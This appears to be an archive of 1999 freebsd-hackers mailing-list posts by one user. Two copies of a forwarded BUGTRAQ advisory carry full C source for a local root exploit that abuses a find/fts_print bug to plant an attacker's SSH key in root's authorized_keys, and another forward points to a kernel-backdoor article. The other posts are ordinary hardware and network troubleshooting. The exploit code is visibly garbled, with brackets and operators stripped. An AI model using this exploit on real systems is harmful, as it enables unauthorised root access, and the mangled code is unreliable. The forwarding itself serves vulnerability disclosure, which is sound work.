(forw) FreeBSD (and other BSDs?) local root explot
This was just posted to BUGTRAQ, are the FreeBSD developers aware of this yet?
-Emil
--
Reverse engineering, the most fun and usually the most effective way
to tackle a problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
/*
(c) 1999 babcia padlina ltd. [EMAIL PROTECTED]
bug in fts_print function allows to overwrite any file in system, when
running /etc/security script (executed from 'daily' scripts).
affected systems:
- freebsd (all versions)
- probably openbsd/netbsd
fix:
- limit root's coredump size
- patch libc
*/
#include stdio.h
#include errno.h
#include sys/stat.h
#include strings.h
#include unistd.h
#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE"/root/.ssh/authorized_keys"
#define CORE"find.core"
#define DEPTH 300
#define BUFSIZE 250
int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{
if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
return -1;
if (chdir(dir))
return -1;
if (symlink(linkfrom, linkto) 0)
return -1;
return 0;
}
int main(argc, argv)
int argc;
char **argv;
{
int i = 0;
char pid[10], buf[BUFSIZE];
sprintf(pid, "%d", getpid());
if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
{
perror("mkdir()");
return -1;
}
if (chdir(pid))
{
perror("chdir()");
return -1;
}
bzero(buf, BUFSIZE);
memset(buf, 0x41, BUFSIZE-1);
for(i=0;iDEPTH;i++)
{
if (makedir(STRING, FILE, CORE) 0)
{
perror("makedir()");
return -1;
}
if(makedir(buf, FILE, CORE) 0)
{
perror("makedir()");
return -1;
}
}
return 0;
}
- ---
* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43 EA93AFA13BE170BF *
-BEGIN PGP SIGNATURE-
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv
iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx
JkgnTo+Dk3QUFGT2bZdmxx9S
=Tyvh
-END PGP SIGNATURE-
(forw) FreeBSD (and other BSDs?) local root explot
This was just posted to BUGTRAQ, are the FreeBSD developers aware of this yet?
-Emil
--
Reverse engineering, the most fun and usually the most effective way
to tackle a problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/
---BeginMessage---
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
/*
(c) 1999 babcia padlina ltd. babu...@freebsd.lublin.pl
bug in fts_print function allows to overwrite any file in system, when
running /etc/security script (executed from 'daily' scripts).
affected systems:
- freebsd (all versions)
- probably openbsd/netbsd
fix:
- limit root's coredump size
- patch libc
*/
#include stdio.h
#include errno.h
#include sys/stat.h
#include strings.h
#include unistd.h
#define STRING \nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n
#define FILE/root/.ssh/authorized_keys
#define COREfind.core
#define DEPTH 300
#define BUFSIZE 250
int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{
if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
return -1;
if (chdir(dir))
return -1;
if (symlink(linkfrom, linkto) 0)
return -1;
return 0;
}
int main(argc, argv)
int argc;
char **argv;
{
int i = 0;
char pid[10], buf[BUFSIZE];
sprintf(pid, %d, getpid());
if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
{
perror(mkdir());
return -1;
}
if (chdir(pid))
{
perror(chdir());
return -1;
}
bzero(buf, BUFSIZE);
memset(buf, 0x41, BUFSIZE-1);
for(i=0;iDEPTH;i++)
{
if (makedir(STRING, FILE, CORE) 0)
{
perror(makedir());
return -1;
}
if(makedir(buf, FILE, CORE) 0)
{
perror(makedir());
return -1;
}
}
return 0;
}
- ---
* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
* Inet: veng...@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
-BEGIN PGP SIGNATURE-
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv
iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx
JkgnTo+Dk3QUFGT2bZdmxx9S
=Tyvh
-END PGP SIGNATURE-
---End Message---
Xircomm ethernet cards....
I have a Xircomm 10/100 pcmcia ethernet card for my laptop and after seraching the mailing lists it is pretty obivious that it is'nt supported. Does and one know of any new developments on this? hacks? If not can some one recommend a good card for freebsd, it would have to be 10/100 mbit and work relatively well with windows aswell as freebsd. I could possibly get my Xircomm replaced. -Emil: -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message
poor ethernet performance?
Hey all, I have two freeBSD machines one 3.1 -STABLE and the other 3.2 -STABLE, I was ftp ing a very large file from one machine to abother over are lan, it began to get extremely slow and began to stall. I suspected two much traffic on our hub (A N etgear 24port 10base-T) so i switched the two machines onto a 8 port Compaq Nett elligent hub. Now there are only these two machines on the hub and they are stil l stalling. I tried ftping both ways but it was the same thing. By looking at the lights on the hob it seems that a burst of data would come for 2 seconds and then it would be dead for 10. I have 3com 3c905b FastEthernet car ds in both machines, and up until now I have never had these kind of problems. Any Ideas? -Emil -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message
Re: poor ethernet performance?
* Andy Doran (a...@fionn.sports.gov.uk) [990716 12:25]: What does 'netstat -in' say? Machine 1 (Tweak) # netstat -in Name Mtu Network AddressIpkts IerrsOpkts Oerrs Coll xl0 1500 Link 00.10.5a.d8.8f.b841804 073961 174 18255 xl0 1500 10/24 10.0.0.64 41804 073961 174 18255 -- Machine 2 (Manson) $ netstat -in Name Mtu Network AddressIpkts IerrsOpkts Oerrs Coll xl0 1500 Link 00.10.4b.b6.1c.ed 130585 17176642 0 17938 xl0 1500 1010.0.2.2 130585 17176642 0 17938 xl0 1500 1010.0.0.3 130585 17176642 0 17938 xl0 1500 1010.0.2.3 130585 17176642 0 17938 -Emil -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message
Re: poor ethernet performance?
* Bill Paul (wp...@skynet.ctr.columbia.edu) [990716 13:58]: I have two freeBSD machines one 3.1 -STABLE and the other 3.2 -STABLE, 3.2-STABLE *FROM WHEN*. What date does it say when you run uname -a! FreeBSD TWEAK.HOME 3.1-STABLE FreeBSD 3.1-STABLE #3: Wed Jun 30 11:00:45 IST 199 9 r...@tweak.home:/usr/src/sys/compile/TWEAK i386 FreeBSD MANSON.HOME 3.2-STABLE FreeBSD 3.2-STABLE #0: Thu Jun 24 20:54:25 IST 1999 r...@manson.home:/usr/src/sys/compile/MANSON i386 I was unsure when i wrote that in the first place so I even checked. You changed out the hub just because one FTP transfer didn't go as fast as you would have liked? Did you reset the interfaces (or reboot the machines) when you reconnected them? I changed the hub because I was planning on doing so for some time anyway, I also rebooted the machines. It sounds a lot to me like you have the duplex modes on the cards set wrong, or that the cards are autonegotiating wrong (which is not impossible -- some switches that have full duplex ports don't do NWAY correctly). The cards must agree with their link partners: if you have them plugged into full duplex ports, then they must also be set to full duplex. If the cards are plugged into half duplex ports, then they also have to be half duplex. Now you're going to ask me how to set the duplex mode on the interface because why read the instructions when you can just ask somebody on the web instead, right? Grrr. # ifconfig xl0 media 10baseT/UTP mediaopt full-duplex # ifconfig xl0 media 10baseT/UTP mediaopt half-duplex That worked, except after a few minutes i got an error on TWEAK reading xl0: watchdog timeout seeing as your allready reading this have you anyideas? Er. I don't get it. You're implying that the bug fairy just visited you one night while you were asleep. This doesn't happen. If you're having trouble now and you weren't before, then you changed something. Stands to reason, doesn't it? Indeed it does, I noticed some slight network performance problems before, but nothing this severe, Also fariys only tend to visit me after too much Gin, which I havent indulged in for quiet some time. Thanks for your help Bill, and also Andy who followed up the thread. -Emil -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message
(forw)
Have you all seen this? -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ Hi folks, THC released a new article dealing with FreeBSD 3.x Kernel modules that can attack/backdoor the system. You can find our article on http://thc.pimmel.com or http://r3wt.base.org. Greets, pragmatic / The Hacker's Choice
(forw)
Have you all seen this? -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ ---BeginMessage--- Hi folks, THC released a new article dealing with FreeBSD 3.x Kernel modules that can attack/backdoor the system. You can find our article on http://thc.pimmel.com or http://r3wt.base.org. Greets, pragmatic / The Hacker's Choice ---End Message---
Re: DVD-ram
* Dag-Erling Smorgrav ([EMAIL PROTECTED]) [990701 11:47]: LaCie don't make drives, they just package them in ugly boxes with noisy fans. Im not sure what model you are refering too, but the drive I have is in a stylish external box with a fan that doesnt make a whisper on noise, It also doesnt make any sound when reading/writeing. The unit is so sturdy I rekon I could through it at a brick wall without damaging it! Overall Im very pleased with this piece of hardware and when it is supported under freebsd it will be one of my most prised devices. : ) -crypt0genic -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to [EMAIL PROTECTED] with "unsubscribe freebsd-hackers" in the body of the message
Re: DVD-ram
* Kenneth D. Merry (k...@plutotech.com) [990701 07:56]: No, its SCSI, im using a adaptec adapter. Keep in mind that i am unfamiliar with SCSI devices so I might allready be doing/have done something stupid ; ) It's not SCSI. The acd driver is the ATAPI CD driver. If you had a SCSI DVD drive, it would show up as 'cd0'. Sorry, the actual dmesg for the device is cd0 at ahc0 bus 0 target 6 lun 0 cd0: MATSHITA PD-2 LF-D100 A110 Removable CD-ROM SCSI-2 device cd0: 10.000MB/s transfers (10.000MHz, offset 15) cd0: cd present [1218960 x 2048 byte records] I apologise for the confusion. -crypt0genic -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message
Re: DVD-ram
* Dag-Erling Smorgrav (d...@flood.ping.uio.no) [990701 11:47]: LaCie don't make drives, they just package them in ugly boxes with noisy fans. Im not sure what model you are refering too, but the drive I have is in a stylish external box with a fan that doesnt make a whisper on noise, It also doesnt make any sound when reading/writeing. The unit is so sturdy I rekon I could through it at a brick wall without damaging it! Overall Im very pleased with this piece of hardware and when it is supported under freebsd it will be one of my most prised devices. : ) -crypt0genic -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message
Re: DVD-ram
I have a Lacie DVD-RAM drive, it work great under windows, here is the DMESG i g et from it, I hope this is of some help. acd0: drive speed 1033KB/sec, 256KB cache acd0: supported read types: acd0: Audio: play, 255 volume levels acd0: Mechanism: ejectable tray acd0: Medium: no/blank disc inside, unlocked AFAIK I need to format the disks im using, but im unsure what format to use, If anyone has some suggestions or would like me to try different things for informa tion purposes I will be glad to help out. Also on another note, what is the support like for a Creative Labs encore DVD dr ive under FreeBSD? -crypt0genic * David Miller ([EMAIL PROTECTED]) [990630 09:53]: Apologies if this should be on -scsi Has anyone done any work with dvd-ram drives under FreeBSD? I will soon need to duplicate dvd-ram media and would very much like to do it under unix. All I need to start with is the ability to read/write the raw device. Currently the drive is recognized as cd0 (FreeBSD 3.2) and I can read a 2.x GB side but not, of course, write it. I'm looking at cdrecord for clues but would like not to reinvent someone elses work. Thanks in advance, --- David To Unsubscribe: send mail to [EMAIL PROTECTED] with "unsubscribe freebsd-hackers" in the body of the message -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to [EMAIL PROTECTED] with "unsubscribe freebsd-hackers" in the body of the message
Re: DVD-ram
* David Miller ([EMAIL PROTECTED]) [990630 22:58]: On Wed, 30 Jun 1999, crypt0genic wrote: IDE interface I take it? This is the normal message for a CD. No, its SCSI, im using a adaptec adapter. Keep in mind that i am unfamiliar with SCSI devices so I might allready be doing/have done something stupid ; ) -crypt0genic I didn't realize it until we used it under 95/98, but the DVD-ram appears to act like an MO drive. IE, one can add, remove, change files at will. I may hack the od driver in the next couple of days to see if it will work at all. -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to [EMAIL PROTECTED] with "unsubscribe freebsd-hackers" in the body of the message
Re: DVD-ram
I have a Lacie DVD-RAM drive, it work great under windows, here is the DMESG i g et from it, I hope this is of some help. acd0: drive speed 1033KB/sec, 256KB cache acd0: supported read types: acd0: Audio: play, 255 volume levels acd0: Mechanism: ejectable tray acd0: Medium: no/blank disc inside, unlocked AFAIK I need to format the disks im using, but im unsure what format to use, If anyone has some suggestions or would like me to try different things for informa tion purposes I will be glad to help out. Also on another note, what is the support like for a Creative Labs encore DVD dr ive under FreeBSD? -crypt0genic * David Miller (dmil...@search.sparks.net) [990630 09:53]: Apologies if this should be on -scsi Has anyone done any work with dvd-ram drives under FreeBSD? I will soon need to duplicate dvd-ram media and would very much like to do it under unix. All I need to start with is the ability to read/write the raw device. Currently the drive is recognized as cd0 (FreeBSD 3.2) and I can read a 2.x GB side but not, of course, write it. I'm looking at cdrecord for clues but would like not to reinvent someone elses work. Thanks in advance, --- David To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message
Re: DVD-ram
* David Miller (dmil...@search.sparks.net) [990630 22:58]: On Wed, 30 Jun 1999, crypt0genic wrote: IDE interface I take it? This is the normal message for a CD. No, its SCSI, im using a adaptec adapter. Keep in mind that i am unfamiliar with SCSI devices so I might allready be doing/have done something stupid ; ) -crypt0genic I didn't realize it until we used it under 95/98, but the DVD-ram appears to act like an MO drive. IE, one can add, remove, change files at will. I may hack the od driver in the next couple of days to see if it will work at all. -- Reverse engineering, the most phun and usually the most effective way to tackle a problem or learn something new. Public PGP key: http://www.ecad.org/crypt0genic_pgp_key Website:http://www.ecad.org/ To Unsubscribe: send mail to majord...@freebsd.org with unsubscribe freebsd-hackers in the body of the message
